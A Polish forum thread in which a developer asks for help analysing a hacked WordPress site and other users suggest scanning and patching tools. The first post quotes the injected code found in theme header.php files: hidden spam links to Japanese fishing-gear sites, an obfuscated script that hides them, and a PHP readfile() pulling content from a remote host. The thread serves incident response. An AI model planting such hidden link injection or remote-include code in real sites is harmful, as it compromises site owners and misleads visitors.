 Wirus in Wordpress |
| Wirus in Wordpress |
Post
#1
|
|
 Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004  |
Hejka, dostalem do analizy strone postawioną na WP, w ktorej w header w theme porto w header.php pojawilo sie takie cos:
Kod <div id="zcs"> <a href="http://www.usercc.com">釣漁具</a> <a href="http://www.usercc.com">釣り道具</a> <a href="http://www.usercc.com">山口屋釣漁具||釣り道具(釣り具)</a> <a href="http://www.kku4h.com/">釣り用品</a> <a href="http://www.kku4h.com/">フィッシング用品</a> <a href="http://www.kku4h.com/">釣り用品: フィッシング用品の通販</a> <a href="http://www.ecotoid.com">大阪漁具</a> <a href="http://www.ecotoid.com">鮎釣り 道具</a> <a href="http://www.ecotoid.com">大阪漁具、鮎釣り 道具、タモ網</a> <a href="http://www.tasmr.com/">中央漁具</a> <a href="http://www.tasmr.com/">大阪 釣具</a> <a href="http://www.tasmr.com/">アメリカ屋漁具?中央漁具 - 漁具!大阪 釣具</a> <a href="http://www.usercc.com">http://www.usercc.com</a> <a href="http://www.kku4h.com/">http://www.kku4h.com/</a> <a href="http://www.ecotoid.com">http://www.ecotoid.com</a> <a href="http://www.tasmr.com/">http://www.tasmr.com/</a> <a href="http://www.vapurtrail.com/">釣り道具</a> <a href="http://www.vapurtrail.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">磯釣り道具</a> <a href="http://www.vapurtrail.com/">釣り道具、釣り用品必要なのかを分かりやすく紹介しています</a> <a href="http://www.ghmuk.com/">釣竿 メーカー</a> <a href="http://www.ghmuk.com/">鮎釣り用品</a> <a href="http://www.ghmuk.com/">渓流釣り用品</a> <a href="http://www.ghmuk.com/">釣竿 メーカー、渓流釣り 鮎竿、釣り道具を探すなら岡野釣具店</a> <a href="http://www.danceani.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">http://www.vapurtrail.com/</a> <a href="http://www.ghmuk.com/">http://www.ghmuk.com/</a> <script>document.getElementById('z'+'c'+'s').style.display='no'+'ne'</script></div> <?php readfile('http://remote2.iduun.net/link/dvd.txt'); ?> No i teraz próbuje dojść ktoredy to wlazło... Ftp i ssh zostały wykluczone przez admina, nie było żadnych takich połączen w wybranym czasie, wiec jakaś dziura w WP? Nie mogę za bardzo nic wygooglać. Wiem, że wp jest dziurawy jak ser szwajcarski.... Jedyna rada to być na bieżąco z aktualizacjami czy cos jeszcze? -------------------- "Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista "Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004 |
@sazian pliki się zmienily raczej tylko header.php we wszystkich themes jakie były.
Zastanawia mnie jednak fakt, ze razem z tą samą datą, co pliki header.php zostal rowniez zmieniony katalog PLUGINS, jednak w nim, nie widac zadnych plikow ze zmianą. Wygląda to wiec tak, jakby ktoś nagrał tam jakiś plik, poczym skasował. Miedzy nagraniem a skasowaniem mogl rzecz jasna jeszcze ten plik wykonac. Idzie jakos na serwerze znaleźć, czy odbyły się takie operacje: Nagranie po czym skasowanie pliku? -------------------- "Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista "Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer |
|
|
|
nospor Wirus in Wordpress 4.05.2015, 14:06:09 
redeemer http://wpscan.org/ + sprawdź ręcznie czy nie używa... 4.05.2015, 14:10:41 memory https://wordpress.org/plugins/bulletproof-security... 4.05.2015, 14:14:26 
redeemer Cytat(memory @ 4.05.2015, 15:14:26 ) ... 4.05.2015, 14:16:33 memory heehehe, pewnie zdążyli załatać 4.05.2015, 14:17:41 redeemer Cytat(memory @ 4.05.2015, 15:17:41 ) ... 4.05.2015, 14:22:25 nospor No ok, przelecialem tym wpscanem, faktycznie troch... 4.05.2015, 14:43:27 redeemer "Starowaty"? To upgrade - nad czym się t... 4.05.2015, 18:15:24 sazian spróbuj czegoś takiego
Kodecho "error 0:... 4.05.2015, 19:16:59 sazian równie dobrze ktoś mógł zmienić datę edycji pliku,... 5.05.2015, 16:08:15 kreatiff Może takie coś? http://www.forum.optymalizacja.com... 5.05.2015, 17:33:41  |
|
Aktualny czas: 21.08.2025 - 11:00 |
